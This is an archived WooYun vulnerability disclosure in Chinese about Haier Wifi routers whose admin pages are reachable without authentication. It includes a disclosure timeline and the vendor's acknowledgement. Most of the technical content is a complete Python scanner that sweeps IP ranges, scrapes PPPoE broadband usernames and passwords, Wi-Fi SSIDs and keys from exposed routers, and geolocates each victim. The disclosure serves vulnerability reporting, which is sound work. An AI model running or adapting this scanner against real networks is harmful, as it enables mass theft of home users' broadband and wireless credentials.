乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-15: 细节已通知厂商并且等待厂商处理中 2015-08-19: 厂商已经确认,细节仅向厂商公开 2015-08-29: 细节向核心白帽子及相关领域专家公开 2015-09-08: 细节向普通白帽子公开 2015-09-18: 细节向实习白帽子公开 2015-10-03: 细节向公众公开
未授权访问
Haier Wifi 路由器管理界面无需密码可直接远程访问,无需其他认证即可获取宽带账号密码以及wifi的ssid和key,使用脚本扫描网段即可轻松获取一部分设备信息。
扫描了少量网段,此类小众路由器使用量并不是太大,但是也是存在风险。给出多个实例截图
下面给出扫描的结果
下面给出扫描的脚本
#!/usr/bin/env python# coding=utf-8# code by 92ez.com# last modify time 2015-08-15 13:21import Queuefrom threading import Threadimport timeimport reimport sysimport subprocessimport jsonimport urllib2#ip to numdef ip2num(ip): ip = [int(x) for x in ip.split('.')] return ip[0] << 24 | ip[1] << 16 | ip[2] << 8 | ip[3]#num to ipdef num2ip(num): return '%s.%s.%s.%s' % ((num & 0xff000000) >> 24, (num & 0x00ff0000) >> 16, (num & 0x0000ff00) >> 8, num & 0x000000ff)#get all ips list between start ip and end ipdef ip_range(start, end): return [num2ip(num) for num in range(ip2num(start), ip2num(end) + 1) if num & 0xff]#main functiondef bThread(iplist): SETTHREAD = raw_input('Thread: ') print '[Note] Running...\n' threadl = [] queue = Queue.Queue() hosts = iplist for host in hosts: queue.put(host) threadl = [tThread(queue) for x in xrange(0, int(SETTHREAD))] for t in threadl: t.start() for t in threadl: t.join()#get host position by Taobao APIdef getposition(host): try: ipurl = "http://ip.taobao.com/service/getIpInfo.php?ip="+host jsondata = urllib2.urlopen(ipurl).read() value = json.loads(jsondata)['data'] info = [value['country'],value['region'],value['city'],value['isp'] ] return info except Exception, e: print "[Note] Get "+ host+" position failed , will retry ...\n" getposition(host)#create threadclass tThread(Thread): def __init__(self, queue): Thread.__init__(self) self.queue = queue def run(self): global PORT while not self.queue.empty(): host = self.queue.get() try: #print host checktitle(host,PORT) except: continuedef checktitle(host,port): aimurl = "http://"+host+":"+port try: f = urllib2.urlopen(aimurl,timeout = 5) htmlcontent = f.read() f.close() title = re.findall(r'<title>(.+?)</title>',htmlcontent) if title[0].encode('utf8') == "Haier Wifi": pppoeusername = re.findall(r'name=\"wan_pppoe_username\" size=\"30\" maxlength=\"128\" value=\"(.+?)\">',htmlcontent) pppoeupassword = re.findall(r'name=\"wan_pppoe_passwd\" size=\"30\" maxlength=\"128\" value=\"(.+?)\">',htmlcontent) ssid = re.findall(r'var ssid = \'(.+?)\'',htmlcontent) key = re.findall(r'var psk = \'(.+?)\'',htmlcontent) wanmac = re.findall(r'var factoryWanMac=\"(.+?)\"',htmlcontent) posinfo = getposition(host) print "Found "+ title[0].encode('utf8') + "\nurl: "+aimurl print "pppoeusername: "+pppoeusername[0].encode('utf8')+" pppoeupassword: "+pppoeupassword[0].encode('utf8') print "ssid: "+ssid[0]+" key: "+key[0].encode('utf8') print "factoryWanMac: "+wanmac[0].encode('utf8') print posinfo[0].encode('utf8')+" "+posinfo[1].encode('utf8')+" "+posinfo[2].encode('utf8')+" "+posinfo[3].encode('utf8')+"\n" except Exception, e: passif __name__ == '__main__': print '\nScan Haier Wifi Router program.\n' startIp = raw_input('Start IP: ') endIp = raw_input('End IP: ') port = raw_input('Port: ') global PORT PORT = port iplist = ip_range(startIp, endIp) print '\n[Note] Will scan '+str(len(iplist))+" ips...\n" bThread(iplist)
至少得加个密码什么的吧,这样裸奔真的好吗
危害等级:高
漏洞Rank:14
确认时间:2015-08-19 17:40
感谢乌云平台白帽子的测试与提醒,我方已安排人员进行处理
暂无